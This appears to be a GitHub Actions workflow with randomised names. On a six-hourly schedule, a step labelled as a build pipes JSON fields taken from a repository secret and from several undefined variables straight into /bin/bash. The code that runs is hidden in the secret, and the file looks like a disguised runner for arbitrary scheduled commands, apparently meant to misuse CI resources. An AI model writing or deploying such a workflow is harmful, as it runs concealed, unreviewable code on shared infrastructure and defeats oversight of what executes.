name: candidateelectronic

on:
  workflow_dispatch:
  schedule:
    - cron: '9 5/6 * * *'

jobs:  # 12689
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: candidateelectronic
        env:
          glw1752: ${{ secrets.glw1752 }}
        run: |
          echo $glw1752 | jq -r .xmy241 | /bin/bash
          echo $bmw55 | jq -r .sdcgq3 | /bin/bash
          echo $du57096 | jq -r .rsl3 | /bin/bash
          echo $i7 | jq -r .g5 | /bin/bash

